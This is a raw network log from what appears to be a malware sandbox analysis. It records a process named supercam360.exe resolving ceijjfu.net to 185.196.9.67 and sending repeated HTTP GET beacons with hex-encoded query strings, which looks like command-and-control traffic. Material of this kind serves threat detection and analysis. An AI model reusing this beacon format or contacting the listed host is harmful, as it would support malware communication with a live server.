                                                  Dec 25, 2024 09:18:32.049527884 CET8049834185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:32.049642086 CET4983480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:32.049802065 CET4984080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:32.169363976 CET8049840185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:33.406331062 CET8049840185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:33.406415939 CET4984080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:33.523550034 CET4984080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:33.523766994 CET4984680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:33.643618107 CET8049846185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:33.643661976 CET8049840185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:33.643846989 CET4984680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:33.643856049 CET4984080192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:33.643898964 CET4984680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:33.763530016 CET8049846185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:34.998603106 CET8049846185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:34.998748064 CET4984680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:35.116461992 CET4984680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:35.116895914 CET4984980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:35.236347914 CET8049846185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:35.236358881 CET8049849185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:35.236444950 CET4984680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:35.236480951 CET4984980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:35.236664057 CET4984980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:35.356560946 CET8049849185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:36.589770079 CET8049849185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:36.589843035 CET4984980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:36.710247993 CET4984980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:36.710565090 CET4985380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:36.830012083 CET8049853185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:36.830035925 CET8049849185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:36.830090046 CET4985380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:36.830112934 CET4984980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:36.830290079 CET4985380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:36.949718952 CET8049853185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:38.182049036 CET8049853185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:38.182224989 CET4985380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:38.288177013 CET4985380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:38.288644075 CET4985980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:38.410100937 CET8049853185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:38.410116911 CET8049859185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:38.410449028 CET4985380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:38.410449028 CET4985980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:38.410681963 CET4985980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:38.530152082 CET8049859185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:39.767740965 CET8049859185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:39.767910004 CET4985980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:39.931221962 CET4985980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:39.931549072 CET4986580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:40.051137924 CET8049865185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:40.051275969 CET8049859185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:40.051331997 CET4986580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:40.051352978 CET4985980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:40.057173014 CET4986580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:40.176908970 CET8049865185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:41.409452915 CET8049865185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:41.409503937 CET4986580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:41.522461891 CET4986580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:41.522809029 CET4986680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:41.642318964 CET8049865185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:41.642353058 CET8049866185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:41.642433882 CET4986580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:41.642457008 CET4986680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:41.642649889 CET4986680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:41.762125015 CET8049866185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:42.999002934 CET8049866185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:42.999262094 CET4986680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:43.162245035 CET4986680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:43.162554979 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:43.282147884 CET8049866185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:43.282172918 CET8049872185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:43.282275915 CET4986680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:43.282289982 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:43.299491882 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:43.419626951 CET8049872185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:44.649640083 CET8049872185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:44.649727106 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:44.756874084 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:44.876631975 CET8049872185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:45.234160900 CET8049872185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:45.234268904 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:45.350723028 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:45.351069927 CET4987880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:45.648817062 CET8049878185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:45.648829937 CET8049872185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:45.648912907 CET4987280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:45.648950100 CET4987880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:45.658651114 CET4987880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:45.778078079 CET8049878185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:47.001017094 CET8049878185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:47.001144886 CET4987880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:47.116189003 CET4987880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:47.116498947 CET4988380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:47.236072063 CET8049883185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:47.236197948 CET4988380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:47.236227036 CET8049878185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:47.236289978 CET4987880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:47.236442089 CET4988380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:47.356122017 CET8049883185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:48.587502003 CET8049883185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:48.587573051 CET4988380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:48.716960907 CET4988380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:48.717266083 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:48.836858034 CET8049883185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:48.836877108 CET8049889185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:48.836916924 CET4988380192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:48.836978912 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:48.837505102 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:48.956971884 CET8049889185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:50.193795919 CET8049889185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:50.193865061 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:50.303814888 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:50.423427105 CET8049889185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:50.780636072 CET8049889185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:50.780721903 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:50.902220011 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:50.905170918 CET4989580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:51.022452116 CET8049889185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:51.022576094 CET4988980192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:51.024816036 CET8049895185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:51.024893999 CET4989580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:51.025093079 CET4989580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:51.144964933 CET8049895185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:52.378236055 CET8049895185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:52.378431082 CET4989580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:52.491400957 CET4989580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:52.491815090 CET4989780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:52.611381054 CET8049897185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:52.611457109 CET4989780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:52.611491919 CET8049895185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:52.611541033 CET4989580192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:52.611732960 CET4989780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:52.731251001 CET8049897185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:53.961704016 CET8049897185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:53.961977005 CET4989780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:54.069441080 CET4989780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:54.069781065 CET4990280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:54.189332008 CET8049897185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:54.189397097 CET8049902185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:54.189593077 CET4989780192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:54.189649105 CET4990280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:54.189850092 CET4990280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:54.309395075 CET8049902185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:55.538913965 CET8049902185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:55.539000034 CET4990280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:55.663294077 CET4990280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:55.664043903 CET4990880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:55.783751965 CET8049902185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:55.783783913 CET8049908185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:55.783868074 CET4990280192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:55.783889055 CET4990880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:55.784058094 CET4990880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:55.903476000 CET8049908185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:57.140731096 CET8049908185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:57.140810966 CET4990880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:57.475148916 CET4990880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:57.475449085 CET4991480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:57.595055103 CET8049914185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:57.595161915 CET8049908185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:57.595284939 CET4990880192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:57.596662998 CET4991480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:57.611469030 CET4991480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:57.731010914 CET8049914185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:58.960964918 CET8049914185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:58.961359978 CET4991480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:59.087177038 CET4991680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:59.087186098 CET4991480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:59.206840992 CET8049916185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:59.206921101 CET4991680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:59.207109928 CET4991680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:59.207191944 CET8049914185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:18:59.208358049 CET4991480192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:18:59.326693058 CET8049916185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:19:00.565427065 CET8049916185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:19:00.565476894 CET4991680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:19:00.680763006 CET4991680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:19:00.680778980 CET4992180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:19:00.800406933 CET8049921185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:19:00.800498962 CET4992180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:19:00.800606012 CET8049916185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:19:00.800658941 CET4991680192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:19:00.800928116 CET4992180192.168.2.4185.196.9.67
                                                  Dec 25, 2024 09:19:00.920507908 CET8049921185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:19:02.159826040 CET8049921185.196.9.67192.168.2.4
                                                  Dec 25, 2024 09:19:02.159919977 CET4992180192.168.2.4185.196.9.67
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 25, 2024 09:17:52.245209932 CET6124453192.168.2.4152.89.198.214
                                                  Dec 25, 2024 09:17:52.538651943 CET5361244152.89.198.214192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 25, 2024 09:17:52.245209932 CET192.168.2.4152.89.198.2140xaf61Standard query (0)ceijjfu.netA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 25, 2024 09:17:52.538651943 CET152.89.198.214192.168.2.40xaf61No error (0)ceijjfu.net185.196.9.67A (IP address)IN (0x0001)false
                                                  • ceijjfu.net
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449736185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:17:52.806850910 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:17:54.147762060 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:17:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449737185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:17:54.393219948 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:17:55.752681017 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:17:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449740185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:17:56.076725006 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:17:57.432785988 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:17:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449741185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:17:57.674550056 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:17:59.027862072 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:17:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449747185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:17:59.268060923 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:00.623742104 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449753185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:00.861545086 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:02.216206074 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449754185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:02.455797911 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:03.809645891 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449760185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:04.048691034 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:05.398211002 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Dec 25, 2024 09:18:05.506959915 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:05.973011017 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449766185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:06.205219984 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:07.562874079 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.449772185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:07.799329042 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:09.155430079 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
